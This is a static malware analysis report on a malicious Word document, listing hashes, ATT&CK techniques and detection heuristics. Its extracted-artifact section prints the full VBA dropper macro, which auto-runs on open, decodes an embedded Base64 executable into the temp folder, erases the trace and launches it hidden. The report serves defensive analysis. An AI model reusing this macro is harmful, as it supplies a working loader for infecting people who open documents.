Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 faa09de926a4fd88…

MALICIOUS

Office (OOXML)

79.8 KB Created: 2017-05-13 02:15:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2019-03-10
MD5: bd2c860eb549ab5838bfdc555f7c4e52 SHA-1: f456025d969b6c25739a9fcb4eaa0e0d21a70d0b SHA-256: faa09de926a4fd8816c1a72ad134beeb1970c737b495df974ab1e0e464a54df8
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

This OOXML document contains VBA macros that are automatically executed via the AutoOpen subroutine. The script utilizes Scripting.FileSystemObject, Microsoft.XMLDOM, and ADODB.Stream to decode and save a Base64 encoded payload from the document body to a file named 'test.exe' in the temporary directory. Subsequently, it uses Wscript.shell to execute this payload, indicating a dropper functionality.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6327353-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6327353-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        If I = True Then
            Set OS = CreateObject("Wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim FS, P
        Set FS = CreateObject("Scripting.FileSystemObject")
        P = FS.GetSpecialFolder(2) & "\" & "test.exe"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1190 bytes
SHA-256: f428c4c20bdf1f4b0edbaa0cf3ecace439feae03bbf74e769a8dbee7ddb9446b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"

Sub AutoOpen()


    Dim FS, P
    Set FS = CreateObject("Scripting.FileSystemObject")
    P = FS.GetSpecialFolder(2) & "\" & "test.exe"

    Dim I
    I = FS.fileexists(P)


    If I = False Then
        Dim DM, EL
        Set DM = CreateObject("Microsoft.XMLDOM")
        Set EL = DM.createElement("tmp")
        EL.DataType = "bin.base64"
        Dim T
        T = ActiveDocument.Paragraphs(1)
        EL.Text = T
        D = EL.NodeTypedValue
        Dim BS
        Set BS = CreateObject("ADODB.Stream")
        BS.Type = 1
        BS.Open
        BS.Write D
        BS.SaveToFile P, 2
    End If

 
    ActiveDocument.Paragraphs(1).Range.Delete
  

    I = FS.fileexists(P)
    If I = True Then
        Set OS = CreateObject("Wscript.shell")
       
        Dim R
        R = OS.Run(P, 0, False)
    End If
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 15872 bytes
SHA-256: 1b7f4dd73ffd51002e6aea31f214aa136ef1d8f24afe9c0ea6371066014d7419
Detection
ClamAV: Doc.Dropper.Agent-6327353-0
Obfuscation or payload: unlikely